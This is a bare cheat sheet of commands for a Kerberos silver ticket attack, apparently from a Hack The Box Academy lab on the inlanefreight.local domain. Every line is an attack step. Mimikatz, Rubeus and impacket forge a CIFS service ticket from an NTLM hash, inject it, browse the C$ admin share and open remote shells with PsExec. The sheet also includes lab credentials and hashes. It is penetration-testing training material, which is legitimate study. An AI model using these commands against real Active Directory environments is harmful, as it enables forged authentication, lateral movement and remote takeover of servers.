Silver Ticket

From Windows:

Import-Module .\PowerView.ps1
Get-DomainSID

mimikatz.exe
kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:ff955e93a130f5bb1a6565f32b7dc127 /target:sql01.inlanefreight.local /service:cifs  /ptt

klist

dir //sql01.inlanefreight.local/c$

--- OR:

mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-2974783224-3764228556-2640795941 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ticket:sql01.kirbi" exit

Rubeus.exe createnetonly /program:cmd.exe /show

Rubeus.exe ptt /ticket:sql01.kirbi

PSExec.exe -accepteula \\sql01.inlanefreight.local cmd

From Linux:

impacket-lookupsid inlanefreight.local/htb-student:'HTB_@cademy_stdnt!'@dc01.inlanefreight.local -domain-sids

impacket-ticketer -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator

export KRB5CCNAME=./Administrator.ccache
impacket-smbclient -k -no-pass sql01.inlanefreight.local

export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass sql01.inlanefreight.local